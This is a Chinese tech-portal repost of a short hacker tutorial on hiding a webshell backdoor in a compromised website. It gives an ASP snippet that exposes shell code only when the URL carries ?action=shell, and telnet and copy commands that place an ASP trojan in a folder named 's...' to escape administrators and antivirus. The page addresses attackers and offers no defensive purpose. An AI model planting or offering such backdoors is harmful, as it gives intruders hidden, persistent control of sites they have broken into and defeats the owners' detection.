Your Ad Here
首页 | 编程语言 | 网站建设 | 游戏天堂 | 冲浪宝典 | 网络安全 | 操作系统 | 软件时空 | 硬件指南 | 病毒相关 | IT 认证
软讯网络 > 网络安全 > 安全知识 > 如何更简单的留你的webshell后门.
【标  题】:如何更简单的留你的webshell后门.
【关键字】:webshell
【来  源】:http://www.cublog.cn/u/19577/showart.php?id=116908

如何更简单的留你的webshell后门.

Your Ad Here

得到网站的webshell后,如果被管理员发现,那么你的马就没用了 ,被删了!
所以我们要隐藏好我们的SHELL,管理员都也不是混饭吃的,

1.
下面教一种很菜的方法,ASP插入法,不容易被发现~ 
在我们要做手脚的ASP文件里加入如下内容
<% if request("action")="ok" then %>
***********************
<% end if %>


***********处加入你的shell代码
就哦克了
访问的时候在你做了手脚的ASP文件后面加上?action=shell(例如:index.asp?action=shell
就可以调出webshell了,不影响正常浏揽
2.
还有一种方法
前提是得到系统权限之后,
telnet
  肉肉IP 
Port
成功telnet之后,传一个asp木马

进入网站目录
最后是在下一层吧
md s...\
copy 1.asp s.../
OK,
这样防毒软件就搞不到了
防问时 http://your 肉肉/s.../1.asp

 

 

代理。:【上一篇】
(动画) dvbbs7.1sp1最新漏洞的研究和利用:【下一篇】
【相关文章】
  • 入侵动网7.1SP1:靠博客得WebShell
  • 从后台得到webshell技巧大汇总
  • webshell 提升 for linux
  • 从后台到webshell的一点思路
  • [原创]通过webshell获得admin全攻略
  • 动网论坛7.0获得WebShell的分析
  • 从上传webshell突破TCP/IP筛选到3389登陆
  • ASP木马Webshell之安全防范解决办法
  • ASP木马Webshell安全解决办案
  • 【随机文章】
  • hg的用法- -
  • 接口处理篇(Linux c)
  • AIX无线系统管理器
  • 70-320随笔《4》
  • 用PowerPoint XP制作交互式选择题
  • 让战略从纸上落地(图)
  • 更改 MSDE sa 密码和登录验证模式
  • 域名怎么申请?
  • 网络世界的“后门”-端口的故事②
  • 在rhas3.0上建立一个完整的邮件系统
  • 【相关评论】
    没有相关评论
    【发表评论】
    姓名:
    邮件:
    随机码*
    评论*
          
    |  首 页  |  版权声明  |  联系我们   |  网站地图  |
    CopyRight © 2004-2007 bbb软讯网络 All Rigths Reserved.